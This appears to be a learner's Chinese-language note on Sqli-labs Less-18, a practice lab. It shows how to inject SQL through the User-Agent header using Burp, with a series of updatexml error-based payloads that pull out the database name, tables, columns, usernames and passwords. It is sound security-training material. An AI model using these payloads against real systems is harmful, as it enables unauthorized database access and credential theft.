Sqli-labs-Less-18(笔记)
在进行第十八关的时候,也许会发生使用admin无法登陆的问题,这是因为在第十七关进行了密码重置
我们只需要将数据库重置一下就ok。
在第十八关
1.登录失败显示ip地址
2.登录成功显示ip地址和User-Agent
在这里无论是在账户还是密码处都无法注入,因为进行了注释
uname=admin’#&passwd=admin&submit=Submit
在这里我们需要使用http头协议,使用burp进行抓包获取
我们在此处进行修改,修改完后点击放包
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0 ’ or updatexml(1,(concat(0x7e,(select database()),0x7e)),1) and ‘1’='1
回显出当前数据库
查询数据库
’ or updatexml(1,(concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e)),1) and ‘1’='1
查询表(security)
’ or updatexml(1,(concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e)),1) and ‘1’='1
查询字段(为了方便只在burp中演示)
’ or updatexml(1,(concat(0x7e,(select column_name from information_schema.columns where table_name=‘users’ limit 0,1),0x7e)),1) and ‘1’='1
查询账户(username)
’ or updatexml(1,(concat(0x7e,(select username from security.users limit 0,1),0x7e)),1) and ‘1’='1
查询密码(password)
’ or updatexml(1,(concat(0x7e,(select password from security.users limit 0,1),0x7e)),1) and ‘1’='1
以此类推爆出所有数据